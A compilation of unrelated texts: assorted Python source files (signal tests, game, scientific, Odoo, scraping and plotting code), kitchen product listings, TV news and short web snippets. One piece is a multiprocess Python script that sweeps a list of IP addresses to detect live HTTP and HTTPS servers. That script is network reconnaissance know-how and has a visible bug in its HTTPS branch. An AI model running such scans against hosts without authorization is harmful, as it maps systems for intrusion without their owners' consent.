signal.emit("baz")
self.assertEqual(self.var, "baz")
# now try to disconnect the signal
signal.disconnect(set_var)
# check that calling the signal again
# no longer triggers the callback
signal.emit("anaconda")
self.assertEqual(self.var, "baz")
def lambda_test(self):
"""Test if a lambda can be correctly connected to a signal."""
foo = FooClass()
signal = Signal()
self.assertIsNone(foo.var)
# connect the signal
# pylint: disable=unnecessary-lambda
lambda_instance = lambda x: foo.set_var(x)
signal.connect(lambda_instance)
# trigger the signal
signal.emit("bar")
# check if the callback triggered correctly
self.assertEqual(foo.var, "bar")
# try to trigger the signal again
signal.emit("baz")
self.assertEqual(foo.var, "baz")
# now try to disconnect the signal
signal.disconnect(lambda_instance)
# check that calling the signal again
# no longer triggers the callback
signal.emit("anaconda")
self.assertEqual(foo.var, "baz")
def clear_test(self):
"""Test if the clear() method correctly clears any connected callbacks."""
def set_var(value):
self.var = value
signal = Signal()
foo = FooClass()
lambda_foo = FooClass()
self.assertIsNone(foo.var)
self.assertIsNone(lambda_foo.var)
self.assertIsNone(self.var)
# connect the callbacks
signal.connect(set_var)
signal.connect(foo.set_var)
# pylint: disable=unnecessary-lambda
signal.connect(lambda x: lambda_foo.set_var(x))
# trigger the signal
signal.emit("bar")
# check that the callbacks were triggered
self.assertEqual(self.var, "bar")
self.assertEqual(foo.var, "bar")
self.assertEqual(lambda_foo.var, "bar")
# clear the callbacks
signal.clear()
# trigger the signal again
signal.emit("anaconda")
# check that the callbacks were not triggered
self.assertEqual(self.var, "bar")
self.assertEqual(foo.var, "bar")
self.assertEqual(lambda_foo.var, "bar")
def signal_chain_test(self):
"""Check if signals can be chained together."""
foo = FooClass()
self.assertIsNone(foo.var)
signal1 = Signal()
signal1.connect(foo.set_var)
signal2 = Signal()
signal2.connect(signal1.emit)
signal3 = Signal()
signal3.connect(signal2.emit)
# trigger the chain
signal3.emit("bar")
# check if the initial callback was triggered
self.assertEqual(foo.var, "bar")
|
Keep knives and other frequently used tools and utensils conveniently within reach with this wall-mounted Magnetic Knife Holder. They can hold sharp knives, tools and utensils securely. And it also won't dull knives.
The Egg Skelter can hold up to 24 eggs (capacity varies based on the size of your eggs) and makes a perfect addition to any kitchen. Color is silver. Egg trough is 1.90" in width. - Holds up to 24 eggs (but maximum capacity varies based on your egg size).
With these simple and functional stainless steel S hooks. 12 X Flat S Hooks. Use them in the bathroom to hang washcloths, loofas, body brushes, toiletries, towels and robes. works great for hanging your kitchen tools,such as pans, pots, spatulas, coffee mugs, hand towels, potholder, spoons.
The S shape is suitable for hanging on existing objects without the need for screws and nails.
10 Hook Under-the-Shelf Mug Rack, Metal Cup Storage Holder & Drying Rack, Silver. Description: - Metal under-the-shelf coffee mug/tea cup rack with 10 hooks. - Installs easily without tools: slide rack over any shelf less than 1 inch thick and at least 12 inches deep. - Can also be used under desks, tables, shelves, and workbenches to hold keys, small tools, cords, or utensils. - Approximate Dimensions (in inches): 3 H × 7.3 W × 11 L; Distance Between Hooks - 2.5 inches.
Combines with other accessories in the GRUNDTAL series. Wipe clean with a soft cloth dampened with water and a mild dish detergent or soap, if necessary. Key features. Wipe dry with a clean cloth. - Can be used in high humidity areas.
This 6-Pc. Wall Mounted Coffee Mug Rack is an easy and convenient way to keep your kitchen clutter free. A fourth bar is used to hang the 2 included baskets which are ideal for storing your coffee and tea accessories.
Hanging Pot Holder Pan Hanger Cookware Hooks Rack Iron Kitchen Storage Organizer.
Hanging Pot Holder Pan Hanger Cookware Hook Rack Iron Kitchen Storage Organizer. Product Material: Stainless steel.
Start organizing your kitchen like a professional chef! No room for under cabinet or drawer storage?. Number one on the market, they combine well with all hanging kitchen tools and accessories and are compatible with most cookware racks.
Uses: Back door design can be placed on the cabinet hanging. Cabinet gadgets can also hang rags, brushes and more-. Product weight: about 50g.
Trending at $4.69eBay determines this price through a machine learned model of the product's sale prices within the last 90 days.
5PCS Stainless Steel S Shape Hooks Kitchen Hanger Rack Clothes Hanging Holders. 5 x S Hooks(stainless steel). Great For Hanging Plants Out Doors, In Hot Houses & Camping. Material: Stainless Steel. It is very powerful for hang many things.
L Size stainless Steel hooks. 3 pcs L Hooks. Material: stainless Steel. Can load-bearing maximum to about 20KG.
Product Description: Ideal for storing sponges Made of stainless steel, durable to use Specification: Material:Stainless Steel Size:5x5x3.4 cm 1.97x1.97x1.34 inch Weight:60g Color:As shown Package included: 1*Storage Rack Brand Homenhome MPN Does not apply Condition 100% Brand New Country/Region of Manufacture China Material Stainless Steel Size 5x5x3.4 cm 1.97x1.97x1.34 inch Weight 60g Package included 1*Storage Rack UPC 682365636485.
Ikea Grundtal 5 pc S Hook Hangers - 2.75"
IKEA 5X Grundtal Hooks. YOU ONLY GET ONE pgk NOT 4, I HAVE 4 pgks available! Every effort is made for accuracy.
5 out of 5 stars - Ikea Grundtal 5 pc S Hook Hangers - 2.75"
3 product ratings3 product ratings - Ikea Grundtal 5 pc S Hook Hangers - 2.75"
With these simple and functional stainless steel S hooks. Use them in the bathroom to hang washcloths, loofas, body brushes, toiletries, towels and robes. works great for hanging your kitchen tools,such as pans, pots, spatulas, coffee mugs, hand towels, potholder, spoons.
Each 'S' Hook Has A Sharp Pointed End Either Side. Long Size:15cm. We will try our best to reduce the risk of the custom duties.
This kitchen couter microwave oven rack is essentail for your daily life. Greatly enhance space saving,make your kitchen tidy and clean. Multi-functional, sturdy and durable. Eight hooks on the microwave oven shelf sides, perfect for hang the spoon, spatula, shovel or small kitchen appliances.
Kitchen Storage Rack Cupboard Hanging Hook Hanger Stainless Steel Organizer. Use them inside a cupboard to hang kitchen utensils, hang a towel in a bathroom or hang a necklace in a closet. Features: 5 Hooks, Drill Free, Space-saving.
Both can be cut to any size, using a hacksaw or pipecutter. Mirror polished finish.
Net design of the soap rack, easy for water drip and ventilation. The soap rack is Stainless Steel, sturdy and durable to use. The soap rack can be removable, and use repeatedly. 1 x Soap Rack with hooks.
Lot 3 IKEA Grundtal Round White Caddy’s w/ SS Hanger Rail System 401.167.44 NEW. Condition is New. Shipped with USPS Priority Mail.
3, Multipurpose: This wall hanger can holds spoon, towels, gloves, knife and fork, pan, pot, keys or other basically anything you want to have hung up in your kitchen, bathroom or other places. And there are 2 choice of installation.
IKEA GRUNDTAL 10 hooks 2 3/4" each. Combines with other accessories in the GRUNDTAL series. Wipe clean with a soft cloth dampened with water and a mild dish detergent or soap, if necessary. - Can be used in high humidity areas.
Dishwasher Safe / Mirror like Finish / Twinkling Grossy Surface / Match well with Silverware. Keep your kitchenwares organized and within reach with this handy, attractive, hygienic stainless steel kitchen ware holder.
Hook Length: 9cm. Color: Silver.
Can be hung on KUNGSFORS rail. May be combined with other products in the KUNGSFORS series. Stainless steel. Maximum load/hook: 9 lb. Maximum load/hook: 4 kg. Wipe clean using a damp cloth and a mild cleaner. |
#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: July 2015
Name: multi_process.py
Purpose: To identify live web applications with a list of IP addresses, using parallel processes
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import multiprocessing, urllib2, argparse, sys, logging, datetime, time
def host_request(host):
print("[*] Testing %s") % (str(host))
target = "http://" + host
target_secure = "https://" + host
timenow = time.time()
record = datetime.datetime.fromtimestamp(timenow).strftime('%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(record)
try:
request = urllib2.Request(target)
request.get_method = lambda : 'HEAD'
response = urllib2.urlopen(request)
response_data = str(response.info())
logger.debug("[*] %s" % response_data)
response.close()
except:
response = None
response_data = None
try:
request_secure = urllib2.urlopen(target_secure)
request_secure.get_method = lambda : 'HEAD'
response_secure = str(urllib2.urlopen(request_secure).read())
response_secure_data = str(response.info())
logger.debug("[*] %s" % response_secure_data)
response_secure.close()
except:
response_secure = None
response_secure_data = None
if response_data != None and response_secure_data != None:
r = "[+] Insecure webserver detected at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[+] Secure webserver detected at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[+] Insecure web server detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[+] Secure web server detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
elif response_data == None and response_secure_data == None:
r = "[-] No insecure webserver at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[-] No secure webserver at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[-] Insecure web server was not detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[-] Secure web server was not detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
elif response_data != None and response_secure_data == None:
r = "[+] Insecure webserver detected at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[-] No secure webserver at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[+] Insecure web server detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[-] Secure web server was not detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
elif response_secure_data != None and response_data == None:
r = "[-] No insecure webserver at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[+] Secure webserver detected at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[-] Insecure web server was not detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[+] Secure web server detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
else:
logger.debug("[-] No results were recorded for %s or %s" % (str(target), str(target_secure)))
def log_init(log):
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
file_handler = logging.FileHandler(log) # File Handler
#stderr_handler = logging.StreamHandler() # STDERR Handler
targets_list = []
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
def main():
# If script is executed at the CLI
usage = '''usage: %(prog)s [-t hostfile] [-f logfile.log] [-m 2] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
parser.add_argument("-m", "--multi", action="store", dest="multiprocess", default=1, type=int, help="Number of proceses, defaults to 1")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.targets == None):
parser.print_help()
sys.exit(1)
# Set Constructors
targets = args.targets # Targets to be parsed
verbose = args.verbose # Verbosity level
processes = args.multiprocess # Threads to be used
log = args.log # Configure the log output file
if ".log" not in log:
log = log + ".log"
# Load the targets into a list and remove trailing "\n"
with open(targets) as f:
targets_list = [line.rstrip() for line in f.readlines()]
# Establish thread list
pool = multiprocessing.Pool(processes=processes, initializer=log_init(log))
# Queue up the targets to assess
results = pool.map(host_request, targets_list)
for result in results:
for value in result:
print(value)
if __name__ == '__main__':
main()
|
Just over two months after Riverdale was renewed for Season 3, the CW has given it an official premiere date.
After leaving fans in suspense with a shocking Season 2 finale, the buzzy teen drama will return Wednesday, October 10 at 8 p.m. Specifics surrounding the show's next chapter remain sparse, though series creator Roberto Aguirre-Sacasa has let a few details slip.
In an interview with The Hollywood Reporter, he said that Season 3, much like Riverdale's first two installments, will include a "high genre element."
"That's what the show is. It's not just about the Archie characters," he explained. "It's the Archie characters put into a specific genre, and we see how they relate and survive and adapt."
And while speaking with Deadline, he shared that it may dig into more of Riverdale's history, including why the town seems to be so plagued by crime.
"We’re going to examine different kinds of pulp and noir," he said. "So if it feels like Riverdale is a place where people are getting killed all the time, maybe we find out that that’s not a coincidence. Maybe in Season 3, that’s actually part of a bigger pattern and a bigger unspoken history."
Elsewhere, he teased the arrival of Jughead's mom and sister, Gladys and Jellybean Jones, and concluded that, for as much as Riverdale ramps up its twists, it will always stay centered around the relationships that have long driven the Archie franchise.
"We are going to have the gonzo, crazy, heightened story and plot twists and turns that people appreciate about Riverdale, sure," he continued. "But I’ll tell you we’re also really going to keep our eye on the prize, which is the friendships and the romances."
Mark your calendars, Riverdale fans! October is coming sooner than you think. |
import typing
from .protos import Entrypoint
from .sprite import Sprite
from .palette import Palette
from .pilot import Pilot
class TournamentFile(Entrypoint):
MAX_ENEMIES = 256
MAX_LOCALES = 10
__slots__ = (
"bk_name",
"winnings_multiplier",
"unknown_a",
"registration_fee",
"assumed_initial_value",
"tournament_id",
"pic_filename",
"locale_logos",
"locale_descriptions",
"locale_titles",
"locale_end_texts",
"palette",
"pilots",
)
def __init__(self):
self.bk_name: str = ""
self.winnings_multiplier: float = 0.0
self.unknown_a: int = 0
self.registration_fee: int = 0
self.assumed_initial_value: int = 0
self.tournament_id: int = 0
self.pic_filename: str = ""
self.palette: Palette = Palette()
self.locale_logos: typing.List[Sprite] = []
self.locale_descriptions: typing.List[str] = []
self.locale_titles: typing.List[str] = []
self.locale_end_texts: typing.List[typing.List[typing.List[str]]] = []
self.pilots: typing.List[Pilot] = []
def serialize(self):
return {
"bk_name": self.bk_name,
"winnings_multiplier": self.winnings_multiplier,
"unknown_a": self.unknown_a,
"registration_fee": self.registration_fee,
"assumed_initial_value": self.assumed_initial_value,
"tournament_id": self.tournament_id,
"pic_filename": self.pic_filename,
"locale_logos": [logo.serialize() for logo in self.locale_logos],
"locale_descriptions": self.locale_descriptions,
"locale_titles": self.locale_titles,
"locale_end_texts": self.locale_end_texts,
"palette": self.palette.serialize(),
"pilots": [p.serialize() for p in self.pilots],
}
def read(self, parser):
enemy_count = parser.get_uint32()
victory_text_offset = parser.get_uint32()
self.bk_name = parser.get_null_padded_str(14)
self.winnings_multiplier = parser.get_float()
self.unknown_a = parser.get_uint32()
self.registration_fee = parser.get_uint32()
self.assumed_initial_value = parser.get_uint32()
self.tournament_id = parser.get_uint32()
# Enemy block offsets
parser.set_pos(300)
offsets = [parser.get_uint32() for _ in range(enemy_count + 1)]
# Enemy data
for m in range(enemy_count):
parser.set_pos(offsets[m])
self.pilots.append(Pilot().read(parser))
# Seek to locales
parser.set_pos(offsets[enemy_count])
# Load logo sprites
self.locale_logos: typing.List[Sprite] = [
Sprite().read(parser) for _ in range(self.MAX_LOCALES)
]
# Tournament palette
self.palette = Palette().read_range(parser, 128, 40)
# Tournament PIC file name
self.pic_filename = parser.get_var_str(size_includes_zero=True)
# Locale texts
for m in range(self.MAX_LOCALES):
self.locale_titles.append(parser.get_var_str(size_includes_zero=True))
self.locale_descriptions.append(parser.get_var_str(size_includes_zero=True))
# Seek to victory texts
parser.set_pos(victory_text_offset)
# Get all end text pages for all pilots for all locales
for t in range(self.MAX_LOCALES):
pilots = []
for h in range(11):
pilots.append(
[parser.get_var_str(size_includes_zero=True) for _ in range(10)]
)
self.locale_end_texts.append(pilots)
return self
|
Shouldn't we draw the vertical line after we draw the middle horizontal line, the horizontal line below the line closing the rectangle ?
We have checked the stroke order of 里 (the simplified character), and we have found no mistake. It may be that we missed something or that you wanted to tell us something else. In those cases please let us know by describing the error or suggestion. We are eager to continuously improve any aspect of trainchinese and appreciate any suggestions. |
#-+--------------------------------------------------------------------
# Igatools a general purpose Isogeometric analysis library.
# Copyright (C) 2012-2016 by the igatools authors (see authors.txt).
#
# This file is part of the igatools library.
#
# The igatools library is free software: you can use it, redistribute
# it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#-+--------------------------------------------------------------------
# QA (pauletti, Jun 6, 2014):
from init_instantiation_data import *
data = Instantiation()
(f, inst) = (data.file_output, data.inst)
classes = ['BernsteinExtraction<%d,%d,%d>' %(x.dim, x.range, x.rank)
for x in inst.all_ref_sp_dims]
classes.append('BernsteinExtraction<0,0,1>')
#---------------------------------------------------
f.write('IGA_NAMESPACE_CLOSE\n')
archives = ['OArchive','IArchive']
id = 0
for c in unique(classes):
alias = 'BernsteinExtractionAlias%d' %(id)
f.write('using %s = iga::%s; \n' % (alias, c))
for ar in archives:
f.write('CEREAL_SPECIALIZE_FOR_ARCHIVE(%s,%s,cereal::specialization::member_serialize)\n' %(ar,alias))
id += 1
f.write('IGA_NAMESPACE_OPEN\n')
#---------------------------------------------------
|
Below is a list of all the valid IP Addresses in the range from 84.192.X.X to 84.223.X.X. If you would like to get more detailed information about a range, click on that range. Otherwise, you can type a specific IP Address in the box to the left to do a quick search. |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp.osv import fields, osv
class hr_config_settings(osv.osv_memory):
_name = 'hr.config.settings'
_inherit = 'res.config.settings'
_columns = {
'module_hr_timesheet_sheet': fields.boolean('Allow timesheets validation by managers',
help ="""This installs the module hr_timesheet_sheet."""),
'module_hr_attendance': fields.boolean('Install attendances feature',
help ="""This installs the module hr_attendance."""),
'module_hr_timesheet': fields.boolean('Manage timesheets',
help ="""This installs the module hr_timesheet."""),
'module_hr_holidays': fields.boolean('Manage holidays, leaves and allocation requests',
help ="""This installs the module hr_holidays."""),
'module_hr_expense': fields.boolean('Manage employees expenses',
help ="""This installs the module hr_expense."""),
'module_hr_recruitment': fields.boolean('Manage the recruitment process',
help ="""This installs the module hr_recruitment."""),
'module_hr_contract': fields.boolean('Record contracts per employee',
help ="""This installs the module hr_contract."""),
'module_hr_evaluation': fields.boolean('Organize employees periodic evaluation',
help ="""This installs the module hr_evaluation."""),
'module_hr_gamification': fields.boolean('Drive engagement with challenges and badges',
help ="""This installs the module hr_gamification."""),
'module_sale_contract': fields.boolean('Allow invoicing based on timesheets (the sale application will be installed)',
help ="""This installs the module sale_contract, which will install sales management too."""),
'module_hr_payroll': fields.boolean('Manage payroll',
help ="""This installs the module hr_payroll."""),
'module_website_hr_recruitment': fields.boolean('Publish jobs on your website',
help ="""This installs the module website_hr_recruitment"""),
'group_hr_attendance': fields.boolean('Track attendances for all employees',
implied_group='base.group_hr_attendance',
help="Allocates attendance group to all users."),
}
def onchange_hr_timesheet(self, cr, uid, ids, timesheet, context=None):
""" module_hr_timesheet implies module_hr_attendance """
if timesheet:
return {'value': {'module_hr_attendance': True}}
return {}
def onchange_hr_attendance(self, cr, uid, ids, attendance, context=None):
""" module_hr_timesheet implies module_hr_attendance """
if not attendance:
return {'value': {'module_hr_timesheet': False,'group_hr_attendance': False}}
return {}
def onchange_group_hr_attendance(self, cr, uid, ids, hr_attendance, context=None):
if hr_attendance:
return {'value': {'module_hr_attendance': True}}
return {}
|
The Academic Secretariat assists the Rector in implementing his policies, the decisions of the Senate and those of university committees.
The Senate Department – dealing with the academic committees of the Senate.
Academic Staff Department – appointments and promotions of academic staff, matters of academic administration.
Research Students Department – scholarships for advanced degrees, and the administrative affairs of research and post-doctoral students.
Foundations and Scholarships Department – handling internal and external scholarships and foundation grants.
Disciplinary committees for students and staff.
Drafting the university's academic rules and protocols and overseeing changes and updates. |
#
# Author : Manuel Bernal Llinares
# Project : trackhub-creator
# Timestamp : 26-07-2017 12:29
# ---
# © 2017 Manuel Bernal Llinares <mbdebian@gmail.com>
# All rights reserved.
#
"""
This pipeline collects data from Ensembl to avoid race conditions when running other pipelines that use this data
"""
import os
import time
# Application imports
import config_manager
import ensembl
from pipelines.template_pipeline import DirectorConfigurationManager, Director
__configuration_file = None
__pipeline_arguments = None
__pipeline_director = None
def set_configuration_file(config_file):
global __configuration_file
if __configuration_file is None:
__configuration_file = config_file
return __configuration_file
def set_pipeline_arguments(pipeline_arguments):
global __pipeline_arguments
if __pipeline_arguments is None:
__pipeline_arguments = pipeline_arguments
return __pipeline_arguments
def get_pipeline_director():
global __pipeline_director
if __pipeline_director is None:
__pipeline_director = EnsemblDataCollector(config_manager.read_config_from_file(__configuration_file),
__configuration_file,
__pipeline_arguments)
return __pipeline_director
class ConfigManager(DirectorConfigurationManager):
_CONFIG_OBJECT_KEY_NCBI_TAXONOMY_IDS = 'ncbi_taxonomy_ids'
def __init__(self, configuration_object, configuration_file, pipeline_arguments):
super(ConfigManager, self).__init__(configuration_object, configuration_file, pipeline_arguments)
self.__pipeline_arguments_object = None
def _process_pipeline_arguments(self):
# Pipeline arguments for this pipeline are like: "ncbi_taxonomy_ids=id,id,id"
id_list = []
if self._get_pipeline_arguments():
id_list = self._get_pipeline_arguments().split('=')[1].split(',')
return {
self._CONFIG_OBJECT_KEY_NCBI_TAXONOMY_IDS: id_list
}
def get_ncbi_taxonomy_ids(self):
return self._get_pipeline_arguments_object()[self._CONFIG_OBJECT_KEY_NCBI_TAXONOMY_IDS]
class EnsemblDataCollector(Director):
"""
This pipeline collects data from the latest Ensembl release for the given taxonomies
"""
def __init__(self, configuration_object, configuration_file, pipeline_arguments):
runner_id = "{}-{}".format(__name__, time.time())
super(EnsemblDataCollector, self).__init__(runner_id)
self.__config_manager = ConfigManager(configuration_object, configuration_file, pipeline_arguments)
def _get_configuration_manager(self):
return self.__config_manager
def __check_downloaded_files(self, files_names_and_paths):
result = True
for file_name, file_path in files_names_and_paths:
if not os.path.exists(file_path):
result = False
self._get_logger().error("MISSING ENSEMBL file '{}' at '{}'".format(file_name, file_path))
return result
def _run_pipeline(self):
# TODO - I can easily parallelize this using the parallel module
# Main pipeline algorithm
self._get_logger().info("[START]---> Pipeline run")
self._get_logger().info("Collecting Ensembl data for NCBI Taxonomies: {}"
.format(",".join(self._get_configuration_manager().get_ncbi_taxonomy_ids())))
ensembl_downloader_service = ensembl.data_downloader.get_data_download_service()
for ncbi_taxonomy_id in self._get_configuration_manager().get_ncbi_taxonomy_ids():
downloaded_protein_sequences = ensembl_downloader_service \
.get_protein_sequences_for_species(ncbi_taxonomy_id)
downloaded_gtf_files = ensembl_downloader_service \
.get_genome_reference_for_species(ncbi_taxonomy_id)
if not downloaded_protein_sequences:
self._get_logger().error("MISSING protein sequence data for taxonomy ID #{}".format(ncbi_taxonomy_id))
else:
self.__check_downloaded_files(downloaded_protein_sequences)
if not downloaded_gtf_files:
self._get_logger().error("MISSING genome reference data for taxonomy ID #{}".format(ncbi_taxonomy_id))
else:
self.__check_downloaded_files(downloaded_gtf_files)
return True
if __name__ == '__main__':
print("ERROR: This script is part of a pipeline collection and it is not meant to be run in stand alone mode")
|
Bradford packages more than just industrial parts. We also protect a multitude of products found in your home; from food products and liquids to cosmetics and pharmaceuticals. Whether our partitions package the container (plastic or glass) or come in direct contact with the product we know that each product has its own unique protection and aesthetic requirements. We have the creativity and the materials to meet your needs. The brands you know and trust rely on us – you can, too! |
# -*- coding: utf-8 -*-
from scrapy.spider import Spider
from scrapy.selector import Selector
from moviespider.items import Cili006Item
from moviespider.moviedb import MovieDB
import scrapy
class DoubanSearch2Spider(Spider):
moviedb = MovieDB()
name = "doubanmovie"
allowed_domains = ["douban.com"]
def start_requests(self):
lst = self.moviedb.getDoubanID_douban()
lstreq = []
for cur in lst:
req = scrapy.FormRequest("http://movie.douban.com/subject/%d/" % (cur[0]), callback=self.search_parse)
req.__setattr__('doubanid', cur[0])
lstreq.append(req)
#break
return lstreq
def search_parse(self, response):
sel = Selector(response)
print 'myparam is %d' % (response.request.doubanid)
title = sel.css('title')[0].xpath('./text()')[0].extract().strip()
print 'title is ' + title
photo = sel.css('a.nbgnbg')[0]
imgurl = photo.xpath('./img/@src')[0].extract()
arr1 = imgurl.split('/')
print 'img is ' + arr1[len(arr1) - 1]
self.moviedb.updMovie_doubanmovie(response.request.doubanid, title, arr1[len(arr1) - 1])
arrinfo = sel.css('div#info')
for curinfo in arrinfo:
print 'info is ' + curinfo.extract()
bi = curinfo.extract().find(u'>又名:</span>');
if bi > 0:
tstr = curinfo.extract()[bi + len(u'>又名:</span>'):]
ei = tstr.find('<br>')
tsrt1 = tstr[0:ei].strip()
print 'other name is ' + tsrt1
tarr1 = tsrt1.split('/')
for t1 in tarr1:
t1 = t1.strip()
print 't1 is ' + t1
self.moviedb.addMovieName_doubanmovie(response.request.doubanid, t1)
break
return [] |
Come stay in our beautiful, historic home in Midtown! You'll have the entire 3rd floor to yourself, with your own private entrance, full kitchen, bathroom, and living room. We're meticulously clean, and we've thought of everything so you don't have to. |
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import collections
import random
import time
import math
import numpy as np
class DynamicPlotter():
def __init__(self, sampleinterval=0.1, timewindow=10., size=(600,350)):
# Data stuff
self._interval = int(sampleinterval*1000)
print(self._interval)
self._bufsize = int(timewindow/sampleinterval)
print(self._bufsize)
self.databuffer = collections.deque([0.0]*self._bufsize, self._bufsize)
self.x = np.linspace(-timewindow, 0.0, self._bufsize)
self.y = np.zeros(self._bufsize, dtype=np.float)
# PyQtGraph stuff
self.app = QtGui.QApplication([])
self.plt = pg.plot(title='Dynamic Plotting with PyQtGraph')
self.plt.resize(*size)
self.plt.showGrid(x=True, y=True)
self.plt.setLabel('left', 'amplitude', 'V')
self.plt.setLabel('bottom', 'time', 's')
self.curve = self.plt.plot(self.x, self.y, pen=(255,0,0))
# QTimer
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.updateplot)
self.timer.start(self._interval)
def getdata(self):
frequency = 0.5
noise = random.normalvariate(0., 1.)
new = 10.*math.sin(time.time()*frequency*2*math.pi) + noise
return new
def updateplot(self):
self.databuffer.append( self.getdata() )
self.y[:] = self.databuffer
self.curve.setData(self.x, self.y)
self.app.processEvents()
def run(self):
self.app.exec_()
if __name__ == '__main__':
m = DynamicPlotter(sampleinterval=0.05, timewindow=10.)
m.run()
|
Blackrock posted on a forum discussion.
Forum Topic: Is Theresa May the Worst British Prime Minister of all time ?
Forum Topic: What will be your new favourite European country after Brexit? |
#
# Copyright (c) 2009 Mason Green & Tom Novelli
#
# This file is part of OpenMelee.
#
# OpenMelee is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# OpenMelee is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OpenMelee. If not, see <http://www.gnu.org/licenses/>.
#
import os
import pygame
import players.kbd_sdl as kbd
from utils import transform
BLACK = 0, 0, 0, 0
WHITE = 255,255,255
class Window:
"A Pygame/SDL interface in the style of Pyglet"
backend = 'sdl'
def __init__(self):
# Initialize Pygame/SDL
os.environ['SDL_VIDEO_WINDOW_POS'] = self.WINDOW_POSITION
pygame.init()
self.screen = pygame.display.set_mode((self.sizeX, self.sizeY))
'''
if sys.hexversion >= 0x2060000:
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Next statement gives this warning... no big deal...
# sysfont.py:139: DeprecationWarning: os.popen3 is deprecated. Use the subprocess module.
self.font = pygame.font.SysFont("", 24)
'''
self.font = pygame.font.SysFont("", 24)
print "Pygame (SDL) backend"
print " Timer resolution: %dms" % pygame.TIMER_RESOLUTION
try:
print " Using %s smoothscale backend." % pygame.transform.get_smoothscale_backend()
except AttributeError:
pass
transform.set_screen(self.screen)
self.clock = pygame.time.Clock()
def set_caption(self, caption):
pygame.display.set_caption(caption)
def get_time_ms(self):
return pygame.time.get_ticks()
def on_draw(self):
self.screen.fill(BLACK)
view = self.calculate_view()
zoom, view_center = view
transform.set_view(view)
# Display debug info
if self.net:
s = "player=%d rtt=%s tdiff=%s" % (
self.local_player,
self.net.rtt_avg,
self.net.tdiff_avg,
)
surf = self.font.render(s, False, WHITE)
self.screen.blit(surf, (0,20))
s = "fps=%3d zoom=%3.3f center=%5d,%5d" % (
self.clock.get_fps(),
zoom,
view_center[0], view_center[1],
)
surf = self.font.render(s, False, WHITE)
self.screen.blit(surf, (0,0))
